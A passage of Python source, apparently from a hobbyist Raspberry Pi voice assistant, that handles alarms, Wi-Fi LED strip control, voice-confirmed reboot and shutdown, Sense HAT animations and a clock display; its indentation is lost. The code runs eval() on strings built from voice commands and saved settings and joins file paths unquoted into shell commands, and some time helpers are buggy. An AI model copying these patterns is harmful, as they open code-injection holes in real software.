Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel'
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' is enable', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms are enable']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
i = 0
alarim = []
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
alarim.append(self.act_cron[i])
i = i + 1
if str(alarim) == '[]':
alarim = 'None'
self.var_save["Alarm cron"] = alarim
Myassistant.save_var_in_file(self)
if settings.get("Led strips"):
leditest = []
for leds in settings.get("Led strips names"):
if str(leds[0]).lower() in str(usrcmd).lower():
leditest.append(str(leds[0]))
if 'my light' in str(usrcmd).lower():
if str(leditest) == '[]':
leditest = ['All']
for ffd in self.tink:
if 'led strip' in ffd:
hudgfisdu = []
hudgfisdu = eval(str(ffd.split('$')[1]))
for te in hudgfisdu:
leditest.append(te)
if not str(leditest) == '[]':
lmk = []
if 'turn on' in str(usrcmd).lower():
lmk.append('turnOn()')
elif 'turn off' in str(usrcmd).lower():
lmk.append('turnOff()')
llmmh = True
colorlist = ['seven color cross fade','red gradual change','green gradual change','blue gradual change','yellow gradual change','cyan gradual change','purple gradual change','white gradual change','red green cross fade','red blue cross fade','green blue cross fade','seven color strobe flash','red strobe flash','green strobe flash','blue strobe flash','yellow strobe flash','cyan strobe flash','purple strobe flash','white strobe flash','seven color jumping']
coloraction = ['setPresetPattern(0x25,100)','setPresetPattern(0x26,100)','setPresetPattern(0x27,100)','setPresetPattern(0x28,100)','setPresetPattern(0x29,100)','setPresetPattern(0x2a,100)','setPresetPattern(0x2b,100)','setPresetPattern(0x2c,100)','setPresetPattern(0x2d,100)','setPresetPattern(0x2e,100)','setPresetPattern(0x2f,100)','setPresetPattern(0x30,100)','setPresetPattern(0x31,100)','setPresetPattern(0x32,100)','setPresetPattern(0x33,100)','setPresetPattern(0x34,100)','setPresetPattern(0x35,100)','setPresetPattern(0x36,100)','setPresetPattern(0x37,100)','setPresetPattern(0x38,100)']
oogjg = len(colorlist) - 1
while oogjg > - 1:
if colorlist[oogjg].lower() in str(usrcmd).lower() and llmmh == True:
llmmh = False
if '%' in str(usrcmd).lower():
try:
yytr = str(usrcmd).lower().index('%')
oppm = []
ppg = True
while ppg:
yytr = yytr - 1
if str(usrcmd).lower()[yytr] == ' ':
ppg = False
else:
oppm.append(str(usrcmd).lower()[yytr])
oppm.reverse()
ll = "".join(oppm)
lmk.append(coloraction[oogjg].replace('100',str(ll)))
except:
lmk.append(coloraction[oogjg])
else:
lmk.append(coloraction[oogjg])
oogjg = oogjg - 1
if '%' in str(usrcmd).lower() and llmmh == True:
try:
yytr = str(usrcmd).lower().index('%')
oppm = []
ppg = True
while ppg:
yytr = yytr - 1
if str(usrcmd).lower()[yytr] == ' ':
ppg = False
else:
oppm.append(str(usrcmd).lower()[yytr])
oppm.reverse()
ll = "".join(oppm)
ghf = int(ll)
ghf = 255 * ghf / 100
ghf = round(ghf)
ll = str(ghf)
lmk.append('brightness='+ll)
except:
pass
if llmmh == True:
for color in settings.get('Custom colors'):
if str(color[0]).lower() in str(usrcmd).lower() and llmmh == True:
llmmh = False
lmk.append(str(color[1]))
if llmmh == True:
responscoled = flux_led.utils.get_color_names_list()
for tey in responscoled:
if str(tey).lower() in str(usrcmd).lower() and llmmh == True:
llmmh = False
resultintero = flux_led.utils.color_object_to_tuple(str(tey))
lmk.append('setRgb('+str(resultintero[0])+','+str(resultintero[1])+','+str(resultintero[2])+')')
assistant.stop_conversation()
if not str(lmk) == '[]':
pr = 0
while pr < len(self.tink):
if 'led strip' in self.tink[pr]:
del self.tink[pr]
pr = pr + 1
name_wifi_led = []
led = flux_led.__main__
for wifi_led in settings.get('Led strips names'):
listwifi[str(wifi_led[0])]=led.WifiLedBulb(wifi_led[1])
name_wifi_led.append(wifi_led[0])
try:
for hhg in leditest:
if hhg == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if not wifiled.isOn() and not 'turnOff()' in lmk and not 'turnOn()' in lmk:
wifiled.turnOn()
time.sleep(1)
for kdk in lmk:
if 'brightness' in kdk:
y = wifiled.getRgbw()
eval('wifiled.setRgbw(r='+str(y[0])+',g='+str(y[1])+',b='+str(y[2])+',w='+str(y[3])+','+str(kdk)+')')
else:
eval('wifiled.'+kdk)
else:
wifiled = listwifi[name]
if not wifiled.isOn() and not 'turnOff()' in lmk and not 'turnOn()' in lmk:
wifiled.turnOn()
time.sleep(1)
for kdk in lmk:
if 'brightness' in kdk:
y = wifiled.getRgbw()
eval('wifiled.setRgbw(r='+str(y[0])+',g='+str(y[1])+',b='+str(y[2])+',w='+str(y[3])+','+str(kdk)+')')
else:
eval('wifiled.'+kdk)
except BrokenPipeError:
print('Failed : "led strip"')
else:
ytr = True
pr = 0
while pr < len(self.tink):
if 'led strip' in self.tink[pr]:
ytr = False
del self.tink[pr]
pr = pr + 1
if ytr:
self.tink.append('led strip$'+str(leditest))
Myassistant.say(self, "What do you want to do with this led strips ?", 'en')
assistant.start_conversation()
else:
Myassistant.say(self, "Sorry, I don't understand.", 'en')
if settings.get("Shutdown option"):
if 'reboot' in str(usrcmd).lower() or 'reboot' in self.tink:
if 'reboot' in self.tink:
del self.tink[self.tink.index('reboot')]
assistant.stop_conversation()
if 'yes' in str(usrcmd).lower():
Myassistant.say(self, Myassistant.yes(), 'en')
if settings.get("Sense hat"):
hat.clear()
os.system('sudo reboot')
else:
Myassistant.say(self, 'Ok, cancel', 'en')
elif 'please' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes(), 'en')
if settings.get("Sense hat"):
hat.clear()
os.system('sudo reboot')
else:
assistant.stop_conversation()
self.tink.append('reboot')
Myassistant.say(self, "Are you sure ?", 'en')
assistant.start_conversation()
if 'shut down' in str(usrcmd).lower() or 'power off' in str(usrcmd).lower() or 'shut down' in self.tink:
if 'shut down' in self.tink:
del self.tink[self.tink.index('shut down')]
assistant.stop_conversation()
if 'yes' in str(usrcmd).lower():
Myassistant.say(self, Myassistant.yes(), 'en')
if settings.get("Sense hat"):
hat.clear()
os.system('sudo halt')
else:
Myassistant.say(self, 'Ok, cancel', 'en')
elif 'please' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes(), 'en')
if settings.get("Sense hat"):
hat.clear()
os.system('sudo halt')
else:
assistant.stop_conversation()
self.tink.append('shut down')
Myassistant.say(self, "Are you sure ?", 'en')
assistant.start_conversation()
def alpha(chaine):
alphabet = 'abcdefghijklmnopqrstuvwxyz 0123456789 éêëè áâäà ùñóíç ’""° ,. !¡ ?¿ +-÷x='
l = []
chaine = chaine
i = len(chaine) - 1
while i > -1 :
l.append(chaine[i])
i = i - 1
i = len(l) - 1
while i > -1 :
if not l[i].lower() in str(alphabet):
del l[i]
i = i - 1
l.reverse()
l = "".join(l)
return l
def trans(words,lang):
translator = Translator()
transword= translator.translate(words, dest=lang)
transword=transword.text
transword=transword.replace("Text, ",'',1)
transword=transword.strip()
return transword
def yes():
b = random.randint(0,11)
p = ()
if b == 0 or b == 1 or b == 2:
p = 'ok'
elif b == 3 or b == 4:
p = 'okay'
elif b == 5 or b == 6:
p = 'of course'
elif b == 7 or b == 8:
p = 'yes'
elif b == 9:
p = 'yep'
elif b == 10:
p = 'yea'
elif b == 11:
p = 'yeah'
else:
p = ''
b = random.randint(0,1)
if b == 0 :
p = p + ' ' + settings.get("Name")
return p
def get_mots(word,listc,sensibility=0):
listclower = []
for element in listc:
listclower.append(str(element).lower())
if sensibility == 0:
result = difflib.get_close_matches(str(word).lower(), listclower)
else:
result = difflib.get_close_matches(str(word).lower(), listclower,sensibility)
resultuper = []
for elementlow in result:
resultuper.append(str(listc[listclower.index(elementlow)]))
return resultuper
def search_wordt(word,listc):
fgh = []
i = len(word) - 1
while i > -1:
o = len(listc) - 1
while o > -1:
if word.lower() in listc[o].lower():
fgh.append(str(listc[o]))
del listc[o]
o = o - 1
kj = []
for g in word:
kj.append(g)
del kj[len(kj)-1]
word = "".join(kj)
i = i - 1
return fgh
def cherchefichier(fichier, rep):
entrees = os.listdir(rep)
for entree in entrees:
if (not os.path.isdir(os.path.join(rep, entree))) and (entree==fichier):
return rep
for entree in entrees:
rep2 = os.path.join(rep, entree)
if os.path.isdir(rep2):
chemin = Myassistant.cherchefichier(fichier, rep2)
if chemin!="":
return chemin
return ""
def time_as_not_pass(hour,minute):
if int(time.strftime("%H")) < int(hour):
return True
elif int(time.strftime("%H")) == int(hour):
if int(time.strftime("%M")) < int(minute):
return True
else:
return False
else:
return False
def have_network(hour,minute):
if settings.get("Network constraint"):
startnet = settings.get("Start of conection").split(",")
endnet = settings.get("End of conection").split(",")
startnet = datetime.time(int(startnet[0]),int(startnet[1]))
endnet = datetime.time(int(endnet[0]),int(endnet[1]))
timefornet = datetime.time(int(hour),int(minute))
if timefornet > startnet and timefornet < endnet:
return True
else:
return False
else:
return True
def ad_min_hour(hour,minu,ad):
while ad > 0:
minu = int(minu) + 1
if minu > 59:
minu = '00'
hour = Myassistant.ad_hour(hour,1)
elif len(str(minu)) < 2:
minu = '0' + str(minu)
ad = ad - 1
return [str(hour),str(minu)]
def remove_min_hour(hour,minu,ad):
while ad > 0:
minu = int(minu) + 1
if minu < 0:
minu = '59'
hour = Myassistant.remove_hour(hour,1)
elif len(str(minu)) < 2:
minu = '0' + str(minu)
ad = ad - 1
return [str(hour),str(minu)]
def ad_hour(hour,ad):
while ad > 0:
hour = int(hour) + 1
if hour > 23:
hour = '00'
elif len(str(hour)) < 2:
hour = '0' + str(hour)
ad = ad - 1
return str(hour)
def remove_hour(hour,remove):
while remove > 0:
hour = int(hour) - 1
if hour < 0:
hour = '23'
elif len(str(hour)) < 2:
hour = '0' + str(hour)
remove = remove - 1
return str(hour)
def ad_min(minu,ad):
while ad > 0:
minu = int(minu) + 1
if minu > 59:
minu = '00'
elif len(str(minu)) < 2:
minu = '0' + str(minu)
ad = ad - 1
return str(minu)
def remove_min(minu,remove):
while remove > 0:
minu = int(minu) - 1
if minu < 0:
minu = '59'
elif len(str(minu)) < 2:
minu = '0' + str(minu)
remove = remove - 1
return str(minu)
def ad_day(day,ad):
while ad > 0:
if day == "Monday" :
day = 'Tuesday'
elif day == "Tuesday" :
day = 'Wednesday'
elif day == "Wednesday" :
day = 'Thursday'
elif day == "Thursday" :
day = 'Friday'
elif day == "Friday" :
day = 'Saturday'
elif day == "Saturday" :
day = 'Sunday'
elif day == "Sunday" :
day = 'Monday'
ad = ad - 1
return str(day)
def remove_day(day,remove):
while remove > 0:
if day == "Monday" :
day = 'Sunday'
elif day == "Tuesday" :
day = 'Monday'
elif day == "Wednesday" :
day = 'Tuesday'
elif day == "Thursday" :
day = 'Wednesday'
elif day == "Friday" :
day = 'Thursday'
elif day == "Saturday" :
day = 'Friday'
elif day == "Sunday" :
day = 'Saturday'
remove = remove - 1
return str(day)
def ad_letter(letter,ad,listl='abcdefghijklmnopqrstuvwxyz '):
listm = []
for letre in listl:
listm.append(letre)
posi = listm.index(letter)
while ad > 0:
posi = posi + 1
if posi > len(listm)-1:
posi = 0
ad = ad - 1
return listm[posi]
def remove_letter(letter,remove,listl='abcdefghijklmnopqrstuvwxyz '):
listm = []
for letre in listl:
listm.append(letre)
posi = listm.index(letter)
while remove > 0:
posi = posi - 1
if posi < 0:
posi = len(listm)-1
remove = remove - 1
return listm[posi]
def butonshearch(self):
pressed = 0
while not self.affichage == 'heure' and not self.affichage == '':
bouton = True
while not self.affichage == 'heure' and not self.affichage == '' and bouton:
if GPIO.input(bsquare) == 0 or GPIO.input(bround) == 0 or GPIO.input(brigt) == 0 or GPIO.input(bleft) == 0:
self.veil = 0
if GPIO.input(bsquare) == 0:
self.buton.append(0)
elif GPIO.input(bround) == 0:
self.buton.append(1)
elif GPIO.input(brigt) == 0:
self.buton.append(2)
elif GPIO.input(bleft) == 0:
self.buton.append(3)
bouton = False
else:
time.sleep(0.1)
if not pressed > 2:
time.sleep(0.3)
else:
time.sleep(0.15)
if GPIO.input(bsquare) == 0 or GPIO.input(bround) == 0 or GPIO.input(brigt) == 0 or GPIO.input(bleft) == 0:
pressed = pressed + 1
else:
pressed = 0
def logo():
t = 0.05
b = (0,0,255)
r = (255,0,0)
j = (255,255,0)
v = (0,255,0)
hat.clear()
hat.set_pixel(2,2,b)
hat.set_pixel(5,2,r)
hat.set_pixel(5,5,j)
hat.set_pixel(2,5,v)
time.sleep(t)
hat.clear()
hat.set_pixel(3,2,b)
hat.set_pixel(5,3,r)
hat.set_pixel(4,5,j)
hat.set_pixel(2,4,v)
time.sleep(t)
hat.clear()
hat.set_pixel(4,2,b)
hat.set_pixel(5,4,r)
hat.set_pixel(3,5,j)
hat.set_pixel(2,3,v)
time.sleep(t)
hat.clear()
hat.set_pixel(2,2,v)
hat.set_pixel(5,2,b)
hat.set_pixel(5,5,r)
hat.set_pixel(2,5,j)
time.sleep(t)
hat.clear()
hat.set_pixel(3,2,v)
hat.set_pixel(5,3,b)
hat.set_pixel(4,5,r)
hat.set_pixel(2,4,j)
time.sleep(t)
hat.clear()
hat.set_pixel(4,2,v)
hat.set_pixel(5,4,b)
hat.set_pixel(3,5,r)
hat.set_pixel(2,3,j)
time.sleep(t)
hat.clear()
hat.set_pixel(2,2,j)
hat.set_pixel(5,2,v)
hat.set_pixel(5,5,b)
hat.set_pixel(2,5,r)
time.sleep(t)
hat.clear()
hat.set_pixel(3,2,j)
hat.set_pixel(5,3,v)
hat.set_pixel(4,5,b)
hat.set_pixel(2,4,r)
time.sleep(t)
hat.clear()
hat.set_pixel(4,2,j)
hat.set_pixel(5,4,v)
hat.set_pixel(3,5,b)
hat.set_pixel(2,3,r)
time.sleep(t)
hat.clear()
hat.set_pixel(2,2,r)
hat.set_pixel(5,2,j)
hat.set_pixel(5,5,v)
hat.set_pixel(2,5,b)
time.sleep(t)
hat.clear()
hat.set_pixel(3,2,r)
hat.set_pixel(5,3,j)
hat.set_pixel(4,5,v)
hat.set_pixel(2,4,b)
time.sleep(t)
hat.clear()
hat.set_pixel(4,2,r)
hat.set_pixel(5,4,j)
hat.set_pixel(3,5,v)
hat.set_pixel(2,3,b)
time.sleep(t)
hat.clear()
hat.set_pixel(2,2,b)
hat.set_pixel(5,2,r)
hat.set_pixel(5,5,j)
hat.set_pixel(2,5,v)
def logo_high():
t = 0.01
hat.clear()
i = 0
while i < 226:
b = (0,0,i)
r = (i,0,0)
j = (i,i,0)
v = (0,i,0)
hat.set_pixel(2,2,b)
hat.set_pixel(5,2,r)
hat.set_pixel(5,5,j)
hat.set_pixel(2,5,v)
time.sleep(t)
i = i + 15
def logo_low():
t = 0.01
i = 225
while i > -1:
b = (0,0,i)
r = (i,0,0)
j = (i,i,0)
v = (0,i,0)
hat.set_pixel(2,2,b)
hat.set_pixel(5,2,r)
hat.set_pixel(5,5,j)
hat.set_pixel(2,5,v)
time.sleep(t)
i = i - 15
hat.clear()
def sound():
subprocess.Popen(["aplay", "~/google-assistant/src/sound/bip.wav"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def volume_set(volume):
os.system("amixer set 'Master' "+str(volume)+"%")
def volume_get():
vol = os.popen("amixer get 'Master' | grep 'Front Right'").read()
vol = vol.split("[")[1]
vol = vol.replace("%] ","")
vol = int(vol)
return vol
def say(self, words, language,save=True):
if not words == '':
gTTS(text=words, lang=language).save("~/google-assistant/src/say.mp3")
threading.Thread(target=self.process_event('ON_RESPONDING_STARTED:\n {"is_error_response": false}'),args=()).start()
os.system("mpg123 -q ~/google-assistant/src/say.mp3")
os.remove("~/google-assistant/src/say.mp3")
if save:
self.text_say = words
self.process_event('ON_RESPONDING_FINISHED')
self.process_event('ON_RENDER_RESPONSE:\n {"text": "' + words + '", "type": 0}')
def refrech_error():
try:
disp.display()
except OSError:
time.sleep(0.1)
try:
disp.display()
except OSError:
time.sleep(0.1)
try:
disp.display()
except OSError:
pass
def aff_clean(self,cl):
if cl:
self.veil = settings.get("Time stand by")*2+1
self.affichage = ''
time.sleep(0.3)
disp.clear()
Myassistant.refrech_error()
else:
if self.affichage == '':
self.affichage = 'heure'
Myassistant.reload_aff_heure_st(self)
def reload_aff_heure_st(self):
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
listal = []
alfortom = False
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' == self.act_cron[i][3]:
listal.append(self.act_cron[i])
i = i - 1
if int(time.strftime("%H")) > 17:
ood = Myassistant.ad_day(time.strftime("%A"),1)
for li in listal:
if str(ood) == li[0] or '-' == li[0]:
if int(li[1]) < 12:
alfortom = True
for li in listal:
if time.strftime("%A") == li[0] or '-' == li[0]:
if int(time.strftime("%H")) < int(li[1]):
alfortom = True
elif int(time.strftime("%H")) == int(li[1]):
if int(time.strftime("%M")) < int(li[2]):
alfortom = True
if alfortom:
alarm = Image.open('~/google-assistant/src/images/clock/alarme.jpg')
alarm = alarm.resize((10,9))
alarm = ImageOps.invert(alarm)
o = random.randint(1,4)
if o == 1:
image.paste(alarm, (random.randint(0,119),random.randint(0,7)))
elif o == 2:
image.paste(alarm, (random.randint(0,6),random.randint(0,55)))
elif o == 3:
image.paste(alarm, (random.randint(112,119),random.randint(0,55)))
elif o == 4:
image.paste(alarm, (random.randint(0,119),random.randint(48,55)))
draw.text((random.randint(15,47),random.randint(14,39)), str(time.strftime("%H")), font=font, fill=255)
draw.text((random.randint(59,101),random.randint(14,39)), str(time.strftime("%M")), font=font, fill=255)
else:
draw.text((random.randint(0,47),random.randint(0,55)), str(time.strftime("%H")), font=font, fill=255)
draw.text((random.randint(59,116),random.randint(0,55)), str(time.strftime("%M")), font=font, fill=255)
disp.image(image)
Myassistant.refrech_error()
def exec_error(self,ex):
try:
ex = str(ex)
if not '#disable' in ex:
if '#cantdel' in ex:
ex = ex.replace("#cantdel","")
eval(ex)
print('Action cron : "' + ex + '"')
except:
print('Failed to execute : "' + ex + '"')
def execute_next(self,direc):
e = settings.get("Custom menu")
i = len(e)-1
while i > -1:
if not settings.get("Led strips"):
if 'Led strip' == e[i]:
del e[i]
elif not settings.get("Music"):
if 'Music' == e[i]:
del e[i]
elif not settings.get("Weather"):
if 'Weather' == e[i]:
del e[i]
i = i - 1
if self.affichage == 'heure total':
fghd = 'Clock'
elif self.affichage == 'led strip':
fghd = 'Led strip'
elif self.affichage == 'météo':
fghd = 'Weather'
elif self.affichage == 'music':
fghd = 'Music'
k = e.index(str(fghd))
if direc == 'left':
if k - 1 < 0:
k = len(e)-1
else:
k = k - 1
else:
if k + 1 > len(e)-1:
k = 0
else:
k = k + 1
disp.clear()
Myassistant.refrech_error()
while not len(self.buton) == 0:
del self.buton[0]
if e[k] == 'Clock':
threading.Timer(0, Myassistant.aff_heure,[self]).start()
elif e[k] == 'Weather':
threading.Timer(0, Myassistant.aff_meteo,[self]).start()
elif e[k] == 'Music':
threading.Timer(0, Myassistant.aff_music,[self]).start()
elif e[k] == 'Led strip':
threading.Timer(0, Myassistant.aff_led_strip,[self]).start()
def save_var_in_file(self):
w = []
for u in self.var_save:
w.append(str(str(u)+" : "+str(self.var_save.get(str(u)))))
w = "\n".join(w)
fichier = open("~/google-assistant/src/save.yaml", "w")
fichier.write(w)
fichier.close()
def adprogvolume(self):
vol = Myassistant.volume_get()
vol1 = vol
while self.al:
vol1 = vol1 + 1
Myassistant.volume_set(vol1)
time.sleep(2)
Myassistant.volume_set(vol)
def stop_al_time(self):
l = 300
while self.al :
if l < 1 :
self.al = False
os.system('sudo killall mpg123')
if settings.get("Led strips"):
try:
led = flux_led.__main__
for adresr in self.var_save.get("Alarm led")[0]:
wifiled = listwifi[adresr]
wifiled.turnOff()
except BrokenPipeError:
print('Failed : "led strip"')
else:
l = l - 1
time.sleep(1)
def alarm_dring(self):
self.al = True
vlc.pause_vlc()
if settings.get("Sense hat"):
Myassistant.logo_high()
self.veil = settings.get("Time stand by")*2+1
if not self.affichage == 'heure total':
if self.affichage == 'heure' or self.affichage == '':
self.affichage = 'heure total'
threading.Timer(0, Myassistant.aff_heure,[self]).start()
threading.Timer(0, Myassistant.butonshearch,[self]).start()
else:
threading.Timer(0, Myassistant.aff_heure,[self]).start()
if settings.get("Led strips"):
if not str(self.var_save.get("Alarm led")) == 'None':
try:
led = flux_led.__main__
for adresr in self.var_save.get("Alarm led")[0]:
wifiled = listwifi[adresr]
if not wifiled.isOn():
wifiled.turnOn()
time.sleep(1)
eval('wifiled.'+str(self.var_save.get("Alarm led")[1]))
except BrokenPipeError:
print('Failed : "led strip"')
threading.Timer(5, Myassistant.adprogvolume,[self]).start()
threading.Timer(0, Myassistant.stop_al_time,[self]).start()
if self.var_save.get("Alarm sound") == 'Def':
while self.al:
os.system("mpg123 -q ~/google-assistant/src/sound/alarm.mp3")
else:
fileplay = self.var_save.get("Alarm sound")
if os.path.isdir(fileplay):
files = []
for path, dirs, file in os.walk(fileplay):
for filename in file:
files.append(path + '/' + filename)
i = len(files) - 1
while i > -1 :
if not ".mp3" in str(files[i]) :
del files[i]
i = i - 1
if not len(files) == 0 :
sefulfiles = []
uuf = files
while len(uuf) > 0:
u = random.randint(0,len(uuf)-1)
sefulfiles.append(uuf[u])
del uuf[u]
dfgh = True
while self.al and dfgh:
p = subprocess.Popen(['mpg123', '-q', str(sefulfiles[random.randint(0,len(sefulfiles)-1)])], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if not str(err) == "b''":
dfgh = False
else:
dfgh = True
while self.al and dfgh:
os.system("mpg123 -q "+str(fileplay))
p = subprocess.Popen(['mpg123', '-q', str(fileplay)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if not str(err) == "b''":
dfgh = False
while self.al:
os.system("mpg123 -q ~/google-assistant/src/sound/alarm.mp3")
self.al = False
self.veil = 0
if settings.get("Sense hat"):
Myassistant.logo_low()
vlc.resume_vlc()
def alarm_action(self):
set_alarm_list = [['Set new alarm','newalarm'],
['Get alarm','getal'],
['Change alarm','changealarm'],
['Remove alarm',[[['All','removeall'],
['Specific alarm','removespec'],
['Exit','exit']],'remove']],
['Set alarm statut',[[['All','actall'],
['Specific alarm','actspec'],
['Exit','exit']],'statut']],
['Costum alarm','costumalarm'],
['Exit','exit']]
setal = Myassistant.select_list(self,set_alarm_list,'alarm menu')
tmasone = Myassistant.ad_min_hour(time.strftime("%H"),time.strftime("%M"),1)
if setal == 'newalarm':
selecttime = Myassistant.select_time(self,'--', '--', '-', 'new alarm',True)
if not (selecttime[0] == '--' or selecttime[1] == '--'):
self.act_cron.append([selecttime[2],selecttime[0],selecttime[1],'Myassistant.alarm_dring(self)#cantdel'])
elif setal == 'removeall':
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
del self.act_cron[i]
i = i - 1
elif setal == 'removespec':
i = 0
alarmcrons = [['All','all']]
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
if self.act_cron[i][0] == '-':
alarmcrons.append(['(Disable) Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['(Disable) Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
if self.act_cron[i][0] == '-':
alarmcrons.append(['Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
i = i + 1
alarmcrons.append(['Exit','exit'])
delalarm = Myassistant.select_list(self,alarmcrons,'select alarm')
if delalarm == 'all':
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
del self.act_cron[i]
i = i - 1
elif not delalarm == 'exit' and not delalarm == None:
del self.act_cron[int(delalarm)]
elif setal == 'changealarm':
i = 0
alarmcrons = []
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
if self.act_cron[i][0] == '-':
alarmcrons.append(['(Disable) Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['(Disable) Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
if self.act_cron[i][0] == '-':
alarmcrons.append(['Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
i = i + 1
alarmcrons.append(['Exit','exit'])
delalarm = Myassistant.select_list(self,alarmcrons,'select alarm')
if not delalarm == 'exit' and not delalarm == None:
selecttime = Myassistant.select_time(self,self.act_cron[int(delalarm)][1],self.act_cron[int(delalarm)][2],self.act_cron[int(delalarm)][0], 'new time',True)
if not (selecttime[0] == '--' or selecttime[1] == '--'):
self.act_cron[int(delalarm)] = [selecttime[2],selecttime[0],selecttime[1],'Myassistant.alarm_dring(self)#cantdel']
else:
del self.act_cron[int(delalarm)]
elif setal == 'getal':
i = 0
alarmcrons = []
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
if self.act_cron[i][0] == '-':
alarmcrons.append(['(Disable) Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['(Disable) Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
if self.act_cron[i][0] == '-':
alarmcrons.append(['Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
i = i + 1
alarmcrons.append(['Exit','exit'])
delalarm = Myassistant.select_list(self,alarmcrons,'alarm')
elif setal == 'costumalarm':
if settings.get("Led strips"):
vffffffv = Myassistant.select_list(self,[['Led strip','led'],['Sound','sound'],['Exit','exit']],'costum')
if vffffffv == 'sound':
choic = Myassistant.select_list(self,[['Default','def'],['File','file'],['Exit','exit']],'alarm sound')
if choic == 'def':
self.var_save["Alarm sound"] = 'Def'
elif choic == 'file':
mscel = Myassistant.select_list(self,[['Radios','radios'],['File','file'],['Exit','exit']],'music')
if mscel == 'radios':
radiona = []
for hgj in settings.get("Radios"):
radiona.append(hgj)
j = Myassistant.select_list(self,radiona,'Radios')
elif mscel == 'file':
j = Myassistant.select_path(self,settings.get("Path to your music"),True)
if not mscel == 'exit' and not mscel == None and not j == None:
self.var_save["Alarm sound"] = str(j)
elif vffffffv == 'led':
choic = Myassistant.select_list(self,[['Color','color'],['None','nones'],['Exit','exit']],'alarm led')
if choic == 'color':
coolor = Myassistant.select_led_strip_color_all(self)
if not '[' in str(coolor[0]):
coolor[0] = [str(coolor[0])]
self.var_save["Alarm led"] = coolor
elif choic == 'nones':
self.var_save["Alarm led"] = 'None'
else:
choic = Myassistant.select_list(self,[['Default','def'],['File','file'],['Exit','exit']],'alarm sound')
if choic == 'def':
self.var_save["Alarm sound"] = 'Def'
elif choic == 'file':
mscel = Myassistant.select_list(self,[['Radios','radios'],['File','file'],['Exit','exit']],'music')
if mscel == 'radios':
radiona = []
for hgj in settings.get("Radios"):
radiona.append(hgj)
j = Myassistant.select_list(self,radiona,'Radios')
elif mscel == 'file':
j = Myassistant.select_path(self,settings.get("Path to your music"),True)
if not mscel == 'exit' and not mscel == None and not j == None:
self.var_save["Alarm sound"] = str(j)
elif setal == 'actall':
choic = Myassistant.select_list(self,[['Enable','en'],['Disable','di'],['Exit','exit']],'select statut')
if choic == 'en':
i = 0
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel'
i = i + 1
elif choic == 'di':
i = 0
while i < len(self.act_cron):
